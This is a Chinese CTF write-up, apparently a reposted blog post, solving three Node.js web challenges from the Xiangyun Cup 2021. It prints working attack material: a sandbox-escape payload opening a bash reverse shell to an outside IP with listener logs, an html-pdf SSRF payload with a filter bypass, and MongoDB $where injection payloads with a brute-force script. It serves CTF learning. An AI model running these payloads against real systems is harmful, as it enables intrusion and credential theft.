IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 祥云杯2021 Web复现 -> 正文阅读

[PHP知识库]祥云杯2021 Web复现

前言

正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。

cralwer_z

有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制:

    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) {
        return res.json({ message: "Sorry but our remote oss server is under maintenance" });
    } else {

因此需要更改user.bucket,但是更改也有这些限制:

        if (url.protocol != "http:" && url.protocol != "https:") return false;
        if (url.href.includes('oss-cn-beijing.ichunqiu.com') === false) return false;
    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(bucket)) {
        res.redirect(`/user/verify?token=${authToken}`)
    } else {

必须包含oss-cn-beijing.ichunqiu.com的话简单,无论是?a=xxx还是#xxxxx都可以。

但是接下来这个verify的功能就是更新bucket:

    let user = await User.findByPk(req.session.userId);
    const result = await Token.findOne({
        token,
        userId: req.session.userId,
        valid: true
    });
    if (result) {
        
        
            await User.update({
                bucket: user.personalBucket
            }, {

需要传入的token是可以找到的才可以。考虑到更新的时候:

        await User.update({
            affiliation,
            age,
            personalBucket: bucket
        }, {

是更新的personalBucket,而verify的时候是更新bucket,而爬虫爬取的则是bucket;如果想可以更新bucket,则必须传的token可以查询到。

正确的解法是,首先更新可以匹配到的地址,获取token,然后再更新为自己的url那里一次,然后再利用第一次获取的token去verify一次即可。

但实际上的话,第一次获取的token会跳转过去,这个token用一次的话,它的valid就会为false,这样的话最后利用应该是不行的,所以需要第一次的时候bp抓包不让它跳转,这样得到的token就是可以用的了。

但实际上复现的时候发现不抓包直接跳转也可以,迷了很久发现这个:

    const result = await Token.findOne({
        token,
        userId: req.session.userId,
        valid: true
    });

不知道是不是出题人故意的,应该写成token:token才对,直接token就是,如果穿了token就永远可以查到数据了,所以出了问题。

rce的话利用https://ha.cker.in/index.php/Article/13563里面的即可。

url写:http://118.31.168.198:39777/index.html#.oss-cn-beijing.ichunqiu.com/即可。

然后url那里的index.html写反弹shell:

<script>c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/118.31.168.198/39876 0>&1'],);console.log(ls.output.toString());")()</script>

然后按步骤打就可以了,最后请求/bucket即可反弹shell:

root@iZbp14tgce8absspjkxi3iZ:~# python3 -m http.server 39777
Serving HTTP on 0.0.0.0 port 39777 (http://0.0.0.0:39777/) ...
117.21.200.166 - - [25/Aug/2021 00:02:00] "GET /index.html HTTP/1.1" 200 -
117.21.200.166 - - [25/Aug/2021 00:02:09] "GET /index.html HTTP/1.1" 200 -


root@iZbp14tgce8absspjkxi3iZ:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from [117.21.200.166] port 39876 [tcp/*] accepted (family 2, sport 10556)
bash: cannot set terminal process group (205): Inappropriate ioctl for device
bash: no job control in this shell
app@9a5e3958e052:/app$ cat /flag
cat /flag
flag{ec14c9ee-801c-403d-9fed-b0910b9618b5}
app@9a5e3958e052:/app$

secrets_of_admin

这题的思路还是比较清晰的。当时没能做出来主要还是因为content那里的绕过不会,还是对node.js不熟悉导致的。

功能有登录,制造pdf,filesinsert,还有通过checknum来读文件。

登录的话,database.js里面给了admine365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645,直接登录即可。files表可以知道,flag在superuser那里,但是superuser不能用。通过下面三行代码也可以知道,需要把flagadmin用户。

            let filename = await DB.getFile(token.username, req.params.id)
            if (fs.existsSync(path.join(__dirname , "../files/", filename))){
                return res.send(await readFile(path.join(__dirname , "../files/", filename)));

但是/api/files/功能那里需要SSRF。

通过查找html-pdf库发现它存在一个任意文件读取:

html-pdf before version 3.0.1 is vulnerable to Arbitrary File Read. The package fails to sanitize the HTML input, allowing attackers to exfiltrate server files by supplying malicious HTML code. XHR requests in the HTML code are executed by the server. Input with an XHR request such as request.open("GET","file:///etc/passwd") will result in a PDF document with the contents of /etc/passwd.

因此可以利用制造pdf的功能来实现ssrf,把flag给admin用户。

<script>
var xhr = new XMLHttpRequest();xhr.open("GET", "http://127.0.0.1:8888/api/files?username=admin&filename=./flag&checksum=123", true);xhr.send();
</script>

而且filename字段是UNIQUE,需要不能直接flag,用./flag。

但是有个问题就是这个过滤:

    if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){
        // even admin can't be trusted right ? :)  
        return res.render('admin', { error: 'Forbidden word 🤬'});
    } else {

当时自己就卡在了这里,不知道怎么绕过。关键就在于node.js的弱类型和php的弱类型有所不同。js中数组和字符串拼接的话,比如["hello"]+"world",得到的是helloworld,而php里确实Arrayworld。也是因为深受php的影响,所以没想到这里可以用数组来绕过,记得URL编码:

http://b34ad16e-b7b2-4eb1-bfc1-8f0840ab5307.node4.buuoj.cn:81/admin

content[]=<script>
var xhr = new XMLHttpRequest();xhr.open("GET", "http://127.0.0.1:8888/api/files?username=admin&filename=./flag&checksum=123", true);xhr.send();
</script>

就实现了SSRF,再访问http://b34ad16e-b7b2-4eb1-bfc1-8f0840ab5307.node4.buuoj.cn:81/api/files/123即可得到flag。

Package Manager 2021

看一下schema.js可以知道用的是mongodb。

发现/auth存在SQL注入:

router.post('/auth', async (req, res) => {
	let { token } = req.body;
	if (token !== '' && typeof (token) === 'string') {
		if (checkmd5Regex(token)) {
			try {
				let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()
				console.log(docs);

存在一个checkmd5Regex的waf,不过因为写的有问题,没有加上^$,所以可以绕过:


const checkmd5Regex = (token: string) => {
  return /([a-f\d]{32}|[A-F\d]{32})/.exec(token);
}

而且注意一下,用的是==而不是=

接下来就是SQL注入出密码了,有两种方式。第一种就是正常的布尔注入:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[0]=="a

写个脚本跑出来即可:

import requests
import string

url="http://fa767ade-d4a2-4335-a76b-84bebdea8395.node4.buuoj.cn:81/auth"
headers={
    "Cookie": "session=s:43UCQxzqHneiwEF-JP_ftZ0Aw1upXuCF.t58XyJ4BQ4rmP8Da+VdQzkHtAd1r4EkRUs9h/Zim3os",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
    "Referer": "http://fa767ade-d4a2-4335-a76b-84bebdea8395.node4.buuoj.cn:81/packages/submit",
    "Origin": "http://fa767ade-d4a2-4335-a76b-84bebdea8395.node4.buuoj.cn:81",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Upgrade-Insecure-Requests": "1",
}

flag = ''
for i in range(10000):
    for j in string.printable:
        if j == '"':
            continue
        payload='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[{}]=="{}'.format(i,j)
        #print(payload)
        data={
            "_csrf":"2PzwJX5n-Y1qH02TLkz3_JXa_OBn2hpgU2G8",
            "token":payload
        }


        r=requests.post(url=url,data=data,headers=headers,allow_redirects=False)
        #print(r.text)
        if "Found. Redirecting to" in r.text:
            #print(payload)
            flag+=j
            print(flag)
            break
"!@#&@&@efefef*@((@))grgregret3r"
"!@#&@&@efefef*@((@))grgregret3r"

第二种是WM的Web师傅的骚姿势,只能说学习了,因为实在不会js呜呜呜呜:

MongoDB支持Javascript语法。所以可以用js语法去抛出内容是admin密码的异常

_csrf=2PzwJX5n-Y1qH02TLkz3_JXa_OBn2hpgU2G8&token=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||
( ()=>{throw Error(this.password)})()=="admin

MongoError: Executor error during find command :: caused by :: Error: !@#&@&@efefef*@((@))grgregret3r : @:1:125 @:1:112

登录即可拿到flag。学到了学到了!

总结

有空还是得去补补js。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-27 11:38:35  更:2021-08-27 11:40:49 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 9:53:15-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码